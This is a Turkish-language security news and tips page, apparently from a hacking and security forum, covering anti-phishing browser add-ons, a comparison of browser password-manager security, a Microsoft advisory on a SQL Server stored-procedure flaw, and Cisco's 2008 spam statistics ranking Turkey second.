    Spam hakkında tecribenizi test etmek için quiz adresindeki spam testini yaparak bu konuda ne kadar bilgili olduğunuz ölçebilirsiniz.

    Casus yazılım içeren siteler hakkında bilginizi test etmek için quiz adresindeki testi inceleyebilirsiniz.

    2) PhishingTank

    Add-on's adresinden yükleyebileceğiniz plug-in ile Phishing’ten korunabilirsiniz. Plug-in'in tanıdığı sitelerin listesi oldukça kabarık. Şuan yaklaşık 500bin tane phishing adresini tanıyabiliyor. Bugüne kadar 1 milyon phis. Sitesini yakaladıklarını belirtiyorlar.

    Tespit edilen siteleri görmek için PhishTank adresini ziyaret edebilirsiniz. Şüphelendiğiniz sitelerin phishing içerip içermediğini buradan sorgulatabilirsiniz. Yine bu adres üzerinden kendi keşfettiğiniz phis. Adreslerini bildirebilirsiniz.

    3) Interclue 1.5.7

    Add-on's adresinden indirebileceğiniz bu ufak plug-in boyutu ufak olmasına rağmen yaptığı iş yönünden büyük.

    İnternette dolaşırken herhangi bir linke tıklamadan önce yanında oluşturduğu ufak ikonuna tıkladığınızda linke tıklamış olsaydınız gideceğiniz yer ve görüntüsü gösterilmektedir. Bu sayede çeşitli göz boyama taktikleri ile sizi herhangi bir linke tıklattırmak isteyen saldırganlardan korunmuş olacaksınız.

    Tarayıcınız Şifrelerinizi Ne Kadar Koruyabiliyor?

    Kullandığınız tarayıcınızda şifrelerinizin güvenliği tamamen o tarayıcının şifre yönetim sisteminin (password management) güvenliği ile alakalıdır. Bu nedenle tarayıcılarda en büyük seçici faktörlerden biri PM'nin güçlü olmasıdır. Güvenlik uzmanı Richard Chapin (Chapin Information Services) yaptığı bir testle popüler tarayıcıların şifre yönetim sistemi güvenliklerini karşılaştırdı.

    Şifre yönetim sistemlerine yönelik 21 yöntemle gerçekleştirilen testin sonucunda Google'ın büyük ümitlerle piyasaya sürdüğü tarayıcısı Chrome, şifre yönetim sistemi güvenliğinde en düşük skoru aldı. Sonuçlara göre Chrome'un yanı sıra Safari 3.2'nin de güvenliği yeterli görülmüyor.

    SQL Server'da Kritik Güvenlik Açığı

    Microsoft, güvenlik bülteninde SQL Server'da bulunan ve kritik olarak nitelendirilen bir güvenlik açığı konusunda müşterilerini uyardı. Güvenlik açığı stored procedure içinde bulunan sp_replwritetovarbin'den kaynaklanmakta ve dışarıdan bir saldırganın SQL Server işlemlerinde kod çalıştırmasına sebebiyet verebilmekte. Varsayılan ayarı tüm SQL Server'larda açık olan stored procedure yapısı SQL Injection saldırılarını da doğurabilir.

    Güvenlik açığı; SQL Server 2000, SQL Server 2005, SQL Server 2005 Express Edition, SQL Server 2000 Desktop Engine ve Windows Internal Database'de bulunmakta. Microsoft bu güvenlik açığını kullanıcıların kendilerinin kapatması gerektiğini bildirdi. Microsoft'un bu güvenlik açığı için ne zaman bir yama çıkaracağı ise henüz belli değil.

    Türkiye Spamda Dünya İkincisi

    Cisco’nun yayınladığı 2008 yılı verilerine göre Türkiye, istenmeyen e-posta (Spam) gönderiminde dünya ikincisi.

    Cisco Systems tarafından her yıl yayınlanan yıllık küresel güvenlik tehditleri ve trendleri raporunda istenmeyen e-posta gönderen ülkeler sıralamasında Türkiye, ABD’nin ardından ikinci sırada yer aldı.

    Rapora göre dünya genelinde günlük 200 milyar istenmeyen e-posta gönderiliyor, bu rakam toplam gönderinin %90’ına yakın bir rakam. 2008 yılında güvenlik hassasiyetine bağlı saldırılar 2007’ye göre %11,5 oranında arttı.

    Bu ikincilikle beraber istenmeyen e-postalar ve internet kullanımındaki genel güvenlik anlayışımızı kurumsal olduğu gibi bireysel olarak da değiştirmeliyiz.

    Araştırmaya göre 2008’in en çok Spam gönderen ülkeleri ve ülkelerin aldığı yüzdeler şu şekilde:

    • ABD %17.2
    • Türkiye %9.2
    • Rusya %8.0
    • Kanada %4.7
    • Brezilya %4.1
    • Hindistan %3.5
    • Polonya %3.4
    • Kore %3.3
    • Almanya %2.9
    • İngiltere %2.9
    • Tayland %2.8
    • İspanya %2.8
    • İtalya %2.4
    • Arjantin %2.1
    • Kolumbiya %2.1
    • Fransa %2.0
    • Diğerleri %26.7

    RootDeviLz.Org OnLine

    RootDeviLz.Org OnLine Hacking and Security Forum